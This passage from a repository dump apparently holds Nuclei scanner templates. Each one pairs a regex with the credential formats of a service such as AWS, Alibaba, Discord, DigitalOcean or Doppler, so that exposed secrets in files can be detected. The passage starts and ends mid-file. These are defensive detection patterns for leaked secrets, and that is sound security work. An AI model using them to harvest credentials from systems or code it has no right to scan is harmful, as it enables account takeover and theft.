.]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 
4a0a0047304502200114ce7db1c3fde42b20020e1d0ccddb88507568c665f21e1cdc8a7b722defdb022100c707d824ef36106683f16cc962e32ac899c727c5b22db59a7af8a4ab957a27d6:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/alibaba/alibaba-key-id.yaml: -------------------------------------------------------------------------------- 1 | id: alibaba-key-id 2 | 3 | info: 4 | name: Alibaba Access Key ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.go 10 | metadata: 11 | verified: true 12 | tags: alibaba,access,file,keys 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 490a0046304402202a929c5a7c56fdcba6baf8a05f5ee26de1dc68039a330a33dba7e6973876605b0220499fe8d24c2d03e30f7ffa4077775380ea6b237262bfdc1319821135d3bf0faf:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/alibaba/alibaba-secret-id.yaml: -------------------------------------------------------------------------------- 1 | id: alibaba-secret-id 2 | 3 | info: 4 | name: Alibaba Secret Key ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.go 10 | metadata: 11 | verified: true 12 | tags: alibaba,secret,file,keys 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - 
(?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4b0a0048304602210087f98e454e5064757753028db3f4a280d96ee2ba47163b503031bb9000820d73022100f8348ca58ad2ee80dba4b7ccbca37a95b7ba44742a4f0ed2f5fd64b952843ef1:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/amazon/amazon-mws-auth-token.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-mws-auth-token-value 2 | 3 | info: 4 | name: Amazon MWS Authentication Token - Detect 5 | author: gaurang 6 | severity: medium 7 | description: Amazon MWS authentication token was detected. 8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 10 | cvss-score: 5.3 11 | cwe-id: CWE-200 12 | tags: file,keys,token,amazon,auth,mws 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | regex: 21 | - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" 22 | # digest: 4a0a00473045022100c334a6bda970ddcb70079df2f8a9a1769a7104636a611691c28787921fc2a1a102200bfe666c925c702093688b5f70b29028fa8c8c92c8b739cee1eaaa3a92144494:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/amazon/amazon-sns-token.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-sns-token 2 | 3 | info: 4 | name: Amazon SNS Token - Detect 5 | author: TheBinitGhimire 6 | severity: info 7 | description: Amazon SNS token was detected. 
8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N 10 | cvss-score: 0 11 | cwe-id: CWE-200 12 | tags: file,keys,token,amazon,aws,sns 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | name: amazon-sns-topic 21 | regex: 22 | - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' 23 | 24 | # Enhanced by md on 2023/05/04 25 | # digest: 490a0046304402207e55ee87e40a2d4d85bcc06d548501b06c21297fdc881073d65676a4819deca30220739ca22a94917910a17365d5f3118dc91aec1092877dc91905cc1f2a0458100d:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/amazon/aws-access-id.yaml: -------------------------------------------------------------------------------- 1 | id: aws-access-key 2 | 3 | info: 4 | name: Amazon Web Services Access Key ID - Detect 5 | author: gaurang 6 | severity: info 7 | description: Amazon Web Services Access Key ID token was detected. 
8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N 10 | cvss-score: 0 11 | cwe-id: CWE-200 12 | tags: file,keys,token,aws,amazon 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | regex: 21 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 22 | # digest: 4a0a0047304502204131589055933e9abecb047239e920aaa9798065f2947a61b8a2ddd8be6fa73a0221009f95d88336637ef94923f4724a94bf96e48debf07677bae0fa3a2e6988751396:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/asana/asana-clientid.yaml: -------------------------------------------------------------------------------- 1 | id: asana-clientid 2 | 3 | info: 4 | name: Asana Client ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.go 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.yaml 10 | metadata: 11 | verified: true 12 | tags: asana,client,file,keys 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4a0a00473045022100ee80a7c2a35b34bc0d48c69c1e26169ef5a2181505d3836e47974bc04e41fbde0220796c13e9c14005e438971b5e1aa2f241fb1a2736a98df48c1acc98e50b1562b9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/beamer-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: beamer-api-token 2 | 3 | info: 4 | name: Beamer API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - 
https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,beamer,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:beamer)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(b_[a-z0-9=_\-]{44})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4a0a00473045022100fcfc6abc15f7dbbac899737691fc7df9720aa9fa24c15b3ab39d26c012479b6f022014363cacef4a92e1d65e067c948733f94b555d8d657b9007bc52d804b3c444cc:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/bittrex/bittrex-access-key.yaml: -------------------------------------------------------------------------------- 1 | id: bittrex-access-key 2 | 3 | info: 4 | name: Bittrex Access Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,bittrex,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4a0a00473045022021ae3b7bce6c874e3e9933741ecdd4a2950a724f5db03308c3d049b7fc8e3be0022100e2d9f990ba789c6f762dbfd3b566867d99336ef9f7be3b21f08fbb17cbd7e74d:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- 
/scan/gadget/sensitive/keys/bittrex/bittrex-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: bittrex-secret-key 2 | 3 | info: 4 | name: Bittrex Secret Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,bittrex,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4b0a0048304602210080c3ff4f4d8f64380bbd4965cc0bf17aee48eec5d25f16020cd6c07a12e5a070022100f9df5e67a69fbd471e028a1fbe6e58159fc49c126517256fc1eeb86a0a25771d:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/branch-key.yaml: -------------------------------------------------------------------------------- 1 | id: branch-key 2 | 3 | info: 4 | name: Branch.io Live Key - Detect 5 | author: 0xh7ml 6 | severity: info 7 | description: Branch.io live key token was detected. 
8 | reference: 9 | - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 10 | classification: 11 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N 12 | cvss-score: 0 13 | cwe-id: CWE-200 14 | tags: file,keys,token 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | regex: 22 | - "key_live_.{32}" 23 | 24 | # Enhanced by md on 2023/05/04 25 | # digest: 490a004630440220307fbc9759a842b11dab44b3a55e808d8e8a5b11cfad4fab56ae5bf6d7ff7ff602203a4a0c6e88a0cc25f9b4869f95a86611d5b5a789fe519bf11f8be6fa685ba02c:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/clojars-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: clojars-api-token 2 | 3 | info: 4 | name: Clojars API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,clojars,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(CLOJARS_)[a-z0-9]{60} 22 | # digest: 4a0a00473045022100e8e34978eeeb59acc43a8c856b5fc0749395c50c95f49496f094ac4cf789dfa0022023f583e761abc90a1bdc22094f12af0e622aa61686970bfa18d42db1cb3a79ff:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/cloudinary.yaml: -------------------------------------------------------------------------------- 1 | id: cloudinary-basic-auth 2 | 3 | info: 4 | name: Cloudinary Basic Authorization - Detect 5 | author: gaurang 6 | severity: high 7 | description: Cloudinary basic authorization token was detected. 
8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 10 | cvss-score: 7.5 11 | cwe-id: CWE-200 12 | tags: keys,file,token,cloudinary 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | regex: 20 | - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+" 21 | 22 | # Enhanced by md on 2023/05/04 23 | # digest: 490a0046304402201744d25857ea77e5daf43a26dc6f905aeb2b0a623b26aa428c90aa67ff84b3c502205bc4dd714202f82f1cbd9ad2b1b5d7d9d97213f83918afc43b060b4970e5f493:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/codecov-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: codecov-access-token 2 | 3 | info: 4 | name: Codecov Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,codecov,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:codecov)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4b0a004830460221008723ce3d0d49d00043601d70f614318dd71d3c20680925198c2a9894cc454460022100cd817ccf94a80cfa81cc2cb192791e916edb1a8612a6ee15e604bbf2dc33d1d6:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/credentials.yaml: -------------------------------------------------------------------------------- 1 | id: basic-auth-creds 2 | 3 | info: 4 | name: Basic Authorization Credentials Check 5 | author: gaurang 6 | 
severity: high 7 | description: Basic authorization credentials embedded in a URL were detected. 8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 10 | cvss-score: 7.5 11 | cwe-id: CWE-200 12 | tags: file,keys,token,auth 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | regex: 20 | - "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]" 21 | 22 | # Enhanced by md on 2023/05/04 23 | # digest: 4a0a0047304502202df27d9178759221ccfd4f42d805760dde03a437cdc608ec1f4f2db3eb89ecde022100d7db05435aaea98edaf4c7bf280ba2d6f0705d6241b5cf95a5502da2d507f8a2:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/databricks-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: databricks-api-token 2 | 3 | info: 4 | name: Databricks API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,databricks,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)\b(dapi[a-h0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4b0a00483046022100d6d700b349ee1fb96e6cd411540efe63b8889339763cbb99e050c5f818336a55022100e87d0bfb5914fdd8aeabf876d62b8cabd4ceefd2150d4f5b51fea00e13847dc6:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/datadog-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: datadog-access-token 2 | 3 | info: 4 | name: Datadog Access Token 5 | author: DhiyaneshDK 6 | 
severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.go 10 | metadata: 11 | verified: true 12 | tags: keys,file,datadog,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:datadog)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4b0a00483046022100934a76ae8d3357dca6e4451871e708a0b644e72c823623aa11e4b212b5df92d5022100df2cce06f252dc3bd0cd517ca757cf1569d1c306f51776bdf2503fe71bc9e20e:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/dependency/dependency-track.yaml: -------------------------------------------------------------------------------- 1 | id: dependency-track 2 | 3 | info: 4 | name: Dependency Track API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/dependency_track.yml 9 | - https://docs.dependencytrack.org/integrations/rest-api/ 10 | - https://docs.dependencytrack.org/getting-started/configuration/ 11 | metadata: 12 | verified: true 13 | max-request: 1 14 | tags: dependency,keys,file 15 | 16 | file: 17 | - extensions: 18 | - all 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | regex: 24 | - \b(odt_[A-Za-z0-9]{32,255})\b 25 | # digest: 4a0a004730450220702a4c3c4219c5f6c449c503a1ada1924589fe8a8ee69ca9788a4fd1da542a7f022100c396ad3ca884547cbb32a55a497a33e09e9d592987536b27742dae33485e1abf:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- 
/scan/gadget/sensitive/keys/digitalocean/digitalocean-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: digitalocean-personal-token 2 | 3 | info: 4 | name: DigitalOcean OAuth Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml 9 | - https://docs.digitalocean.com/reference/api/ 10 | metadata: 11 | verified: true 12 | tags: keys,file,digitalocean,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)\b(doo_v1_[a-f0-9]{64})\b 23 | # digest: 4a0a0047304502201ccaf3d5a659a1894d1c7a03933525e497128dcc3bf18923983865cbc0589f4f022100d373d44b781d6d17d86eb95e98b1293ea6fe64100591124dc0aba8caa73c600e:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/digitalocean/digitalocean-personal-access.yaml: -------------------------------------------------------------------------------- 1 | id: digitalocean-personal-access 2 | 3 | info: 4 | name: DigitalOcean Personal Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml 9 | - https://docs.digitalocean.com/reference/api/ 10 | metadata: 11 | verified: true 12 | tags: file,keys,digitalocean,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)\b(dop_v1_[a-f0-9]{64})\b 23 | # digest: 4a0a00473045022100f146de3e812aa02bc68e6bd8a380bbb31e19020d3b029b7058a43b25a50cd67c02201aaa5c47262abba69de2d0520cab36504880f2eb20785e5c81e7af2d4e20d1bd:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- 
/scan/gadget/sensitive/keys/digitalocean/digitalocean-refresh-token.yaml: -------------------------------------------------------------------------------- 1 | id: digitalocean-refresh-token 2 | 3 | info: 4 | name: DigitalOcean Refresh Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml 9 | - https://docs.digitalocean.com/reference/api/ 10 | metadata: 11 | verified: true 12 | tags: file,keys,digitalocean,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)\b(dor_v1_[a-f0-9]{64})\b 23 | # digest: 4a0a004730450220402ac7235c9f81afab06065b456d5b16538ef65064d66dc59b93ffe594109f6b022100eceb599d627e574fc31382e8444e8101d779d0480e9a98691a2834a2658e6dff:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/discord/discord-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: discord-api-token 2 | 3 | info: 4 | name: Discord API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,discord,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 
490a00463044022037733afdc50da25bb9aad70105e098f1202e735dc5444395ce93ab296deaa5e9022067beba9000a0f6beb4c06e8ee726b8da6eb5c318ed497acb539100d2c07dee3b:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/discord/discord-client-id.yaml: -------------------------------------------------------------------------------- 1 | id: discord-client-id 2 | 3 | info: 4 | name: Discord Client ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,discord,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{18})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4a0a0047304502200d273d5de14ba14f6ffb36950cef0703e6397c3b39ce626788b05c5175646176022100b31634e39d09a01921856286b8498ec9d340d32e9b39c2a70878fc034bbf8499:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/docker/dockerhub-pat.yaml: -------------------------------------------------------------------------------- 1 | id: dockerhub-pat 2 | 3 | info: 4 | name: Docker Hub Personal Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/dockerhub.yml 9 | - https://docs.docker.com/security/for-developers/access-tokens/ 10 | metadata: 11 | verified: true 12 | tags: docker,keys,file 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: 
body 21 | regex: 22 | - \b(dckr_pat_[a-zA-Z0-9_-]{27})(?:$|[^a-zA-Z0-9_-]) 23 | # digest: 4a0a00473045022100bc73fcf69453af6d917f363d99e57d06620e6b40f1e38b54ac72982c1aff0865022030218f700bce4f88878c34d596fcc3563ee6a6a0f233055703455751caaabd08:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/doppler-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: doppler-api-token 2 | 3 | info: 4 | name: Doppler API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,doppler,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (dp\.pt\.)(?i)[a-z0-9]{43} 22 | # digest: 4a0a00473045022100dc52d6b1fb23bf2c2c3c8d4d9e916c690983e2be8fab56fad96025202a66d37902200c8b8f6a353d9f716725c24c0de34f2ef15e0b3a7be7bb55442053a6f610daa2:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/doppler/doppler-audit.yaml: -------------------------------------------------------------------------------- 1 | id: doppler-audit 2 | 3 | info: 4 | name: Doppler Audit Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml 9 | - https://docs.doppler.com/reference/api 10 | - https://docs.doppler.com/reference/auth-token-formats 11 | metadata: 12 | verified: true 13 | tags: doppler,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 
23 | - \b(dp\.audit\.[a-zA-Z0-9]{40,44})\b 24 | # digest: 490a00463044022047f3853a49b38bfc41c3a21edae871fa20dbc00c3e4fec75a443da4c802ce4e702205fce2aa010ee24edfbc190aad5475ba28a4ea42e81476b2e36a2eb95de8c4479:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/doppler/doppler-cli.yaml: -------------------------------------------------------------------------------- 1 | id: doppler-cli 2 | 3 | info: 4 | name: Doppler CLI Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml 9 | - https://docs.doppler.com/reference/api 10 | - https://docs.doppler.com/reference/auth-token-formats 11 | metadata: 12 | verified: true 13 | tags: doppler,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - \b(dp\.ct\.[a-zA-Z0-9]{40,44})\b 24 | # digest: 4b0a00483046022100de413ad22bea43d8292d3d22ed07b2d5c6a06bfb4819104c20eeb9134f913be2022100d2915ad20b135f4f8d477c1acec455af6c749833455e09d2542c0e849ab3fc7b:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/doppler/doppler-scim.yaml: -------------------------------------------------------------------------------- 1 | id: doppler-scim 2 | 3 | info: 4 | name: Doppler SCIM Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml 9 | - https://docs.doppler.com/reference/api 10 | - https://docs.doppler.com/reference/auth-token-formats 11 | metadata: 12 | verified: true 13 | tags: doppler,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - 
\b(dp\.scim\.[a-zA-Z0-9]{40,44})\b 24 | # digest: 4a0a00473045022010274194b3725b6ef14112e5fc7f4e0d5c60123a51583f044bf2e94b76077001022100a0caa7739f04c145ec8ee920c613f38a6b5befd04918931bd0ee39cfdbcf3a44:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/doppler/doppler-service-account.yaml: -------------------------------------------------------------------------------- 1 | id: doppler-service-account 2 | 3 | info: 4 | name: Doppler Service Account Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml 9 | - https://docs.doppler.com/reference/api 10 | - https://docs.doppler.com/reference/auth-token-formats 11 | metadata: 12 | verified: true 13 | tags: doppler,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - \b(dp\.sa\.[a-zA-Z0-9]{40,44})\b 24 | # digest: 4a0a00473045022100c8177f1a0244e794af08cc9615e65a415d8cb7dc3616acc9f779e61aab518eb002204d63814164c93815807eb87c0919830977be1d4f878bd1697b90644de744894c:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/doppler/doppler-service.yaml: -------------------------------------------------------------------------------- 1 | id: doppler-service 2 | 3 | info: 